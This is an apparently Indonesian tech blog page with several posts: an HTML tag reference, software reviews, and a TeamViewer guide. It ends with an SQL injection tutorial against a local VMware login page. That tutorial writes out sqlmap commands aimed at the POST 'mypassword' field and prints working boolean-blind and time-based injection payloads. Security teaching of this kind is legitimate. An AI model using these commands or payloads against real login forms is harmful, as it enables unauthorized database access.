Rabu, 13 Juni 2012

Tutorial HTML: Kumpulan Tag HTML



<!– –>Memberi komentar atau keterangan. Kalimat yang terletak pada tag kontiner ini tidak akan terlihat pada browser
<a href>Membuat link ke halaman lain atau ke bagian lain dari halaman tersebut
<a name>Membuat nama bagian yang didefinisikan pada link pada halaman yang sama
<applet>Sebagai awal dari Java applets
<area>Mendefinisikan daerah yang dapat diklik (link) pada image map
<b>Membuat teks tebal
<basefont>Membuat atribut teks default seperti jenis, ukuran dan warna font
<bgsound>Memberi (suara latar) background sound pada halaman web
<big>Memperbesar ukuran teks sebesar satu point dari defaultnya
<blink>Membuat teks berkedip
<body>Tag awal untuk melakukan berbagai pengaturan terhadap text, warna link & visited link
<br>Pindah baris
<caption>Membuat caption pada tabel
<center>Untuk perataan tengah terhadap teks atau gambar
<comment>Meletakkan komentar pada halaman web tidak tidak akan nampak pada browser
<dd>Indents teks
<div>Represents different sections of text.
Menambahkan sound or file avi ke halaman web
<fn>Seperti tag <a name>
<font>Mengganti jenis, ukuran, warna huruf yang akan digunakan utk teks
<form>Mendefinisikan input form
<frame>Mendefinisikan frame
<frameset>Mendefinisikan attribut halaman yang akan menggunakan frame
<h1> … <h6>Ukuran font
<head>Mendefinisikan head document.
<hr>Membuat garis horizontal
<html>Bararti dokumen html
<i>Membuat teks miring
<img>Image, imagemap atau an animation
<input>Mendefinisikan input field pada form
<li>Membuat bullet point atau baris baru pada list (berpasangan dengan tag <dir>, <menu>, <ol> and <ul> )
<map>Mendefinisikan client-side map
<marquee>Membuat scrolling teks (teks berjalan) – hanya pada MS IE
<nobr>Mencegah ganti baris pada teks atau images
<noframes>Jika browser user tidak mendukung frame
<ol>Mendefinisikan awal dan akhir list
<p>Ganti paragraf
<pre>Membuat teks dengan ukuran huruf yg sama
<script>Mendefinisikan awal script
<table>Membuat tabel
<td>Kolom pada tabel
<title>Mendefinisikan title
<tr>Baris pada tabel
<u>Membuat teks bergaris bawah

Cara Membuat Slide Show Photo


DVD Photo Maker
PhotoDVD Maker Profesional v8.10 merupakan salah satu cara untuk membuat slide show yang mudah digunakan bahkan untuk newbie sekalipun, karena tampilan yang mudah dan fungsi klik yang luar biasa kita dapat mengaturnya sedemikaian rupa sesuai selera kita. enak bukan!!! jagan sampai ada yang tanya gimana cara nginstalnya ya!!!!:P , untuk fiturnya sebagai berikut :
• Fitur Baru: Dukungan Blu-ray Disc
• mendukung HD video output
• mendukung MP4 MP4 HD video output
• membuat foto slideshow profesional dengan banyak efek
• membuat tayangan slide photo di DVD dengan mudah
• menambahkan seni teks dan klip ke slide show
• dapat menambahkan video ke foto slide show
• membuat foto bergaya film (dvd)
• ada banyak efek yang mengagumkan dan tema Customizable menu dan DVD template
• kecepatan encoding pembakaran intuitif dan sangat mudah untuk menavigasi ITU
Dengan fitur di atas tentunya kita makin dapat berkreasi, sobat dapat menambahkan musik MP3, WMA atau WAV sebagai suara latar belakang tampilan slide. Tayangan slide foto dapat dibakar ke DVD, Blu-ray DVD, VCD 2.0 (gambar diam) atau SVCD untuk menonton di TV (NTSC dan PAL TV sistem). sobat juga dapat mentransfer foto slideshow film ke ponsel, iPod, iPhone, Zune, PSP, Archos, media player Creative Zen atau lainnya. dapat meng-upload photo slide show yang dibuat ke YouTube, MySpace, banyak lagi deh dapat dilakukan program ini, apa lagi dalam photo wedding, walimah dan sebagainya.

Senin, 28 Mei 2012

Cara Memperbaiki File Yang Rusak dengan Mudah


Banyak sekali penyebab rusaknya sebuah file entah itu karena virus, eror saat download atau bisa juga kerena filenya korup. Lalu bagaimana cara memperbaiki file yang rusaktersebut? Apakah masih bisa diperbaiki? Lalu Bagaimana caranya?
Jika file atau dokumen yang dimaksud rusaknya belum terlalu parah kita bisa memperbaikinya dengan menggunakan aplikasi yang bernama file repair. File repair ini merupakan freeware yang memiliki fungsi khusus untuk memperbaiki atau mengembalikan file yang rusak seperti semula.
Cara memperbaiki file yang rusak adalah dengan cara melakukan scanning terhadap file tersebut dan mengekstraknya menjadi sebuah file yang bisa digunakan kembali. Tapi perlu anda ingat file yang bisa dikembalikan hanya file-file tertentu yang memiliki kerusakan yang belum begitu parah saja.
file repair 2.1
Berikut ini adalah beberapa file yang bisa diperbaiki oleh File Repair versi terbaru :
  • Ms. Word, Ms. Exel, Ms. Ppt
  • Zip,Rar
  • PDF
  • Mp3, mp4, mov, avi, dll
File Repair 100% gratis jadi anda tidak perlu mengeluarkan uang sedikitpun untuk mendapatkan software yang satu ini. Inilah beberapa penyebab kerusakan file yang bisa dikembalikan lagi seperti semula :
  • Management sumber daya komputer yang buruk
  • Terinfeksi virus
  • Aplikasi error
  • Kualitas jaringan yang buruk saat mendownload file
Sekali lagi perlu saya ingatkan jika software ini tidak sepenuhnya bisa memperbaiki semua file yang rusak apa lagi jenis file atau data yang dilengkapi dengan password. Bagi yang ingin mendownload silahkan langsung saja menuju website resminya di filerepair1.com.
Sedikit review dari saya software ini sangat mudah dan ringan saat digunakan. Untuk segi tampilan juga cukup bagus untuk sebuah aplikasi freeware.

Cara Remote Komputer Jarak Jauh

cara remote komputer jarak jauh bisa menemukan solusinya. Dari sisi kegunaannya, sampai bagaimana cara mengoperasikannya Team Viewqer sangatlah mudah untuk digunakan.
Hal pertama akan kami jelaskan apa itu Team Viewer:

Team Viewer adalah suatu program cukup sederhana dan sangatlah mudah digunakan untuk melakukan akses Komputer (PC) dari jarak jauh secara remote melalui internet. software tersebut merupakan salah satu aplikasi Remote Dekstop.
Bagi Rekan yang belum mengetahui apa itu Remote Desktop disini kami akan memberikan pengertiannya. Adapun Remote Desktop adalah:istilah yang menggambarkan dimana sebuah komputer yang satu, bisa dikendalikan oleh komputer yang lainnya dengan menggunakan media jaringan komputer seperti Internet.

Kegunaan Team viewer:
Adapun kegunaan program ini adalah jika suatu waktu kita berada pada tempat dimana kita tertinggal akan suatu file, maka kita bisa mengambil file tersebut melalui Team Viewer dengan fasilitas transfer filenya. Dengan catatan komputer yang dituju dan komputer yang sedang dipegang masing masing memiliki Team Viewer yang sudah di install. Begitu juga bagi kita yang sering melakukan support mengenai permasalahan komputer dikantor juga bisa menggunakan program ini. Dari sisi fasilitas remote controlnya mampu membantu kesulitan pengguna komputer dalam permasalahan softwarenya atau setting yang masih dalam skup perangkat lunak (OS, Aplikasi Perkantoran, Pengaturan dan lain lain). Atau saat kita berada diluar kota namun tiba tiba salah satu dari staff kita menginginkan beberapa file namun harus dijelaskan atau dipresentasikan, maka dengan adanya fasiltas remote desktop, chat, dan juga file trasfer kita akan dimudahkan dengan ini semua.
Berikut langkah langkah menggunakan Team Viewer sebagai software Remote Komputer jarak jauh:
  1. Install TeamViewer di komputer yang akan diremote (disini kami umpamakan komputer client) dan komputer untuk meremote ( umpamakan komputer server)
  2. Pilih “personal /non-commercial use
  3. Lalu pilih kedua checklist perjanjian
  4. Pilih installation type “Normal Installation (default)
  5. Untuk Access Control pilih “Full Access (recommended)
  6. Tunggu proses instalasi sedang berjalan
  7. Klik “Finish
NB: TeamViewer juga dapat di jalankan tanpa di instal terlebih dahulu dengan memilih option “Run” pada saat pertama kali software di jalankan.
Langkah Penggunaan software TeamViewer
  1. Jalankan software TeamViewer
  2. ID dan Password yang muncul adalah ID dan Password TeamViewer computer itu.
  3. Untuk Meremote computer yang lain maka kita harus tahu ID dan Passwrod TeamViewer computer yang akan diremote. Disini misalkan computer yang akan diremote (client) mempunya ID 544 256 627 dan Password 4005. Maka langkah selanjutnya adalah memasukka ID di form sebelah kanan.
  4. Klik “Connect to partner
  5. Tunggu beberapa saat, lalu masukkan password . Klik “Log on
  6. Komputer client pun siap di remote.
Bagi Anda yang berminat untuk menggunakanya Silahkan Anda bisa mendownload disiniatau bisa dengan mengunduh melalui gambar yang ada dibawah ini :
 

Sabtu, 26 Mei 2012

Tutorial SQL Injection Level 4


Tutorial SQL Injection Level 4 - Kali ini saya akan memberikan sedikit pelajaran mengenai SQL Injection level 4. Pada tutorial kali ini, saya tidak menggunakan live target, karena saya rasa itu bersifat merusak. Sehingga saya coba metode ini di localhost dengan bantuan VMware. :D

Bahan - Bahan Yang Akan Kita Gunakan Pada  Tutorial SQL Injection Level 4 :
  1. Mozilla Firefox *
  2. Tamper Data *
  3. SQLmap * 

1. Menguji vulnerability

Kali ini, vmware saya telah berjalan dan memiliki ip address 172.16.33.131. Saya buka firefox, kemudian saya masukan IP address 172.16.33.131 pada address bar.

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, - r14nulr00t.blogspot.com

  Setelah Itu Test Login Dengan :
Username : admin Password : admin
Kemudian Hasil-nya :

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, - 

r14nulr00t.blogspot.com

Kita berada di halaman checklogin.php . Disini tidak ada parameter untuk diuji. Mungkin saya bisa menguji data yang dikirim ke server. Saya kembali lagi ke halaman login. Dengan Username Dan Password : 
Username : admin Password : '

Dan Hasilnya :

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com

Kelihatannya website ini Vulnerable . Namun tetap tidak ada parameter. Sehingga dapat disimpulkan bahwa vulnerability bukan terletak pada parameter, melainkan DATA. Untuk mengecek data yang dikirim ke server, saya gunakan Tamper Data .

2. Tamper Data In Action 

Jika anda belum memiliki tamper data, anda bisa Mendownloadnya Lewat link ini >>. Namun add-on ini hanya dapat digunakan di Mozilla Firefox. Dan tidak dapat digunakan di Browser lain.


Setelah menginstall, tamper data dapat diaktifkan di Tools --> Tamper Data

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com
  
Kembali ke halaman login Dengan Username & Password : 
Username : admin Password : 123

Maka tamper data akan mengambil setiap data yang terjadi selama proses transfer data dari client ke server, maupun sebaliknya.

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com

OK. Saya temukan POSTDATA=myusername=admin&mypassword=123&Submit=Login. Ternyata ada 3 data di sini. yaitu myusername, mypassword, dan Submit. Dan kita telah mengetahui bahwa data password vulnerable. Selanjutnya kita akan gunakan SQLmap untuk menguji database menggunakan informasi yang telah kita dapatkan.

3. SQLmap in Attack
  
red-dragon [~] >> cd /pentest/database/sqlmap/                                                           red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --flush-session
Keterangan :

-u = url [Pesan error muncul pada halaman checklogin.php]
--data = [Kali ini kita akan memberikan data pada server dengan cara tampering / menyuap]
-p = parameter [Parameter yang vulnerable adalah mypassword
--flush-session = Bagian ini tidak masalah jika tidak disertakan.

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, - 

r14nulr00t.blogspot.com

Muncul pertanyaan :
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Kemudian muncul lagi :
sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

dan berujung pada CRITICAL :
[CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid --string or a valid --regexp, refer to the user'smanual for details 

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, Backtrack, - 

r14nulr00t.blogspot.com

4. Over
Saya coba naikan level dan risk pada testing SQLmap menjadi 5.  
red-dragon [/pentest/database/sqlmap] >> python sqlmap.py -u http://172.16.33.131/checklogin.php --data="POSTDATA=myusername=admin&mypassword=123&Submit=Login" -p mypassword --level=5 --risk=5

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, Backtrack, - 

r14nulr00t.blogspot.com

Kemudian muncul lagi:
sqlmap got a 302 redirect to 'http://172.16.33.131:80/login_success.php'. Do you want to follow? [Y/n]

Saya tekan "n" [tanpa tanda kutip], kemudian "enter"

Dan muncul pesan yang membahagiakan:
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

Saya jawab "n", kemudian "enter".

Dan payload untuk website ini adalah: 
Place: POST Parameter: mypassword Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: POSTDATA=myusername=admin&mypassword=-3973' OR (5599=5599) AND 'eHOv'='eHOv&Submit=Login Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: POSTDATA=myusername=admin&mypassword=123' AND 2246=BENCHMARK(5000000,MD5(0x77544b50)) AND 'bGtM'='bGtM&Submit=Login

SQL Injection, Tutorial SQL Injection, SQL Injection Level 4, SQLmap, Tamper Data, Mozilla Firefox, Admin Login, Admin Login Injection, Backtrack, - 

r14nulr00t.blogspot.com